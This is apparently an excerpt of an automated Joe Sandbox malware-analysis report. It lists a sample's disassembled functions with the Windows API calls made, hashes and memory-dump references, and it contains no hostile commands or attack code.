                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$SetChoseTypeMode : %d
                                                                                  • API String ID: 970810673-4200225807
                                                                                  • Opcode ID: 332b9206e26c81c0d270e162c3475eea375fbe17377a8052eb795af00532b126
                                                                                  • Instruction ID: 6eb93d4306041c1617d6be82efc56bb7e5005e2e372ccef2a7362af81b9da896
                                                                                  • Opcode Fuzzy Hash: 332b9206e26c81c0d270e162c3475eea375fbe17377a8052eb795af00532b126
                                                                                  • Instruction Fuzzy Hash: 0A0171B2808340ABDB10DB64CD45F5B7BE9AB99644F05481DF64593241DA74EA08CBE7
                                                                                  Function 0BE94A3C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06,?,?,?,?,00000002,0BE94BB2,0BE92F57,0BE92F9F), ref: 0BE94A75
                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06,?,?,?,?,00000002,0BE94BB2,0BE92F57,0BE92F9F), ref: 0BE94A7B
                                                                                  • GetStdHandle.KERNEL32(000000F5,0BE94AC4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06), ref: 0BE94A90
                                                                                  • WriteFile.KERNEL32(00000000,000000F5,0BE94AC4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0BE94B06), ref: 0BE94A96
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 0BE94AB4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleWrite$Message
                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                  • API String ID: 1570097196-2970929446
                                                                                  • Opcode ID: 03e3b295f75825e6921fe941e8e9d46660796ed06f75ed617fb145961500a7ca
                                                                                  • Instruction ID: 9ab555edce0f81320b1e2eb7e4241a2a269ff26153836e8df46bc097f29cbbe3
                                                                                  • Opcode Fuzzy Hash: 03e3b295f75825e6921fe941e8e9d46660796ed06f75ed617fb145961500a7ca
                                                                                  • Instruction Fuzzy Hash: 4BF03061A84346B9FF74B2B6BC47F5D22AC4785F15F94A305F311F80C0A7E485CAA72A
                                                                                  Function 0BEB5E90 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0BEB5EBE
                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 0BEB5EDA
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0BEB5EF9
                                                                                  • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0BEB5F1D
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0BEB5F3B
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0BEB5F4F
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0BEB5F6F
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0BEB5F87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1781840570-0
                                                                                  • Opcode ID: 50ef5ee11e99f094504c65f3c85f05c36f96962c9a233e09ea580523a9ad522f
                                                                                  • Instruction ID: d2187175e2da44d00605ae737cbba20778aa26c72f818de3ae2b51ef009c44fb
                                                                                  • Opcode Fuzzy Hash: 50ef5ee11e99f094504c65f3c85f05c36f96962c9a233e09ea580523a9ad522f
                                                                                  • Instruction Fuzzy Hash: FC214FB1A50218BEEF50DBA4DD96FAEB3ACEB08704F501591FB04E6180D774AE489B24
                                                                                  Function 6A6EF1E4 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalLock.KERNEL32(?), ref: 6A6EF203
                                                                                  • lstrcmpA.KERNEL32(?,?), ref: 6A6EF20F
                                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 6A6EF221
                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6EF241
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6EF249
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 6A6EF253
                                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6A6EF260
                                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6A6EF278
                                                                                    • Part of subcall function 6A6F58DA: GlobalFlags.KERNEL32(?), ref: 6A6F58E9
                                                                                    • Part of subcall function 6A6F58DA: GlobalUnlock.KERNEL32(?), ref: 6A6F58FB
                                                                                    • Part of subcall function 6A6F58DA: GlobalFree.KERNEL32(?), ref: 6A6F5906
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 168474834-0
                                                                                  • Opcode ID: 6f499e8f74f56ed10b7802277750808c288ab35d581c0e12046e1d66739fc953
                                                                                  • Instruction ID: 0f28cd36abda401f27ca46893b2844d9699a9639ac41c3bb776ad62502070de1
                                                                                  • Opcode Fuzzy Hash: 6f499e8f74f56ed10b7802277750808c288ab35d581c0e12046e1d66739fc953
                                                                                  • Instruction Fuzzy Hash: F311DAB5504500BBCF224BB2CC8DC6B7AFEFF89708B150029F605E1060DB35CD02AB24
                                                                                  Function 6A6FAB3F Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 6A6FAB4E
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 6A6FAB55
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 6A6FAB5C
                                                                                  • GetSystemMetrics.USER32(00000003), ref: 6A6FAB66
                                                                                  • GetDC.USER32(00000000), ref: 6A6FAB70
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 6A6FAB81
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6A6FAB89
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6A6FAB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1151147025-0
                                                                                  • Opcode ID: 0c27efdf647eae54a732e25d883644f7cf77e9cbe2599a142a51e647383fd313
                                                                                  • Instruction ID: 40b300c36b4172a9cbfbb6f6257e3766962487c0ace3714b93ea8ec7cfe5f1e5
                                                                                  • Opcode Fuzzy Hash: 0c27efdf647eae54a732e25d883644f7cf77e9cbe2599a142a51e647383fd313
                                                                                  • Instruction Fuzzy Hash: 1FF01DB1E40718AAEB105FB68C4AB167FE8FB86761F044536E605DB2C0DBB59C518FD0
                                                                                  Function 6A6FF316 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 3886058894-0
                                                                                  • Opcode ID: 26fc8633026f330a037a17cae88990d3a3d9ce2dbda1e7c4a8d0db87d2db285e
                                                                                  • Instruction ID: dc2ff533f14a4a364bb6093594823feede2a5b0c19018f74dc0eb18f0d734364
                                                                                  • Opcode Fuzzy Hash: 26fc8633026f330a037a17cae88990d3a3d9ce2dbda1e7c4a8d0db87d2db285e
                                                                                  • Instruction Fuzzy Hash: 9C51C772A00605EBCB248FB9C94858E7BB7EF91324F118A69E834961D1DF709957CFA0
                                                                                  Function 0BEB6488 Relevance: 10.7, APIs: 7, Instructions: 168windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB6579
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB6588
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0BEB65DF
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0BEB65ED
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB65F6
                                                                                  • DeleteObject.GDI32(?), ref: 0BEB65FF
                                                                                  • CreateIcon.USER32(0BE90000,?,?,?,?,?,?), ref: 0BEB6627
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                  • String ID:
                                                                                  • API String ID: 1030595962-0
                                                                                  • Opcode ID: 709ee8dbcd755657d8396ae732742d8efe9f35dd4933282b48b86fc857b1afe1
                                                                                  • Instruction ID: afe92782650b9f6a3b046280dbd2f8416f1a5c5f38d3ea94b1afc306346329f4
                                                                                  • Opcode Fuzzy Hash: 709ee8dbcd755657d8396ae732742d8efe9f35dd4933282b48b86fc857b1afe1
                                                                                  • Instruction Fuzzy Hash: 6161BC75A10219AFCB40DFA8D981EEEBBF8FF09300B119466E954EB211D731AD55CBA0
                                                                                  Function 6A6E2130 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: 2$PrsProt
                                                                                  • API String ID: 2102423945-1774862053
                                                                                  • Opcode ID: 088d0d1cb076ddbd6a61e2ed775b8ab6904506f7b3bd6520099171a6580504e0
                                                                                  • Instruction ID: 738cfe76ef3e78c9fa702a46af48d899478fd9cc90c114519118e04990d9374d
                                                                                  • Opcode Fuzzy Hash: 088d0d1cb076ddbd6a61e2ed775b8ab6904506f7b3bd6520099171a6580504e0
                                                                                  • Instruction Fuzzy Hash: 2F41E27150C3815FD725CB28D855BDBB7E9AF95704F044958E68987242EF70A60CC7E2
                                                                                  Function 6A6F7F5C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6F7FEB
                                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 6A6F8014
                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 6A6F8026
                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 6A6F8037
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 6A6F8053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend_memset
                                                                                  • String ID: ,
                                                                                  • API String ID: 2997958587-3772416878
                                                                                  • Opcode ID: 9944f55b74a2d4fd3e55824e16bae8e7fbfbbfd9050e23e1421b324da94a13af
                                                                                  • Instruction ID: 5de264b89a84c29e2fc43877a5433f0594347dcb835681a066a9fba973dcac88
                                                                                  • Opcode Fuzzy Hash: 9944f55b74a2d4fd3e55824e16bae8e7fbfbbfd9050e23e1421b324da94a13af
                                                                                  • Instruction Fuzzy Hash: 2731E4316007109FDB109FB9C888A6EB7FABF48714B12097DE5A697691DF30E802CB55
                                                                                  Function 6A6DBCB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6DBCCE
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6DBCDE
                                                                                  • _memset.LIBCMT ref: 6A6DBCF8
                                                                                  • _sprintf.LIBCMT ref: 6A6DBD0B
                                                                                  • _memset.LIBCMT ref: 6A6DBD1F
                                                                                  Strings
                                                                                  Memory Dump Source
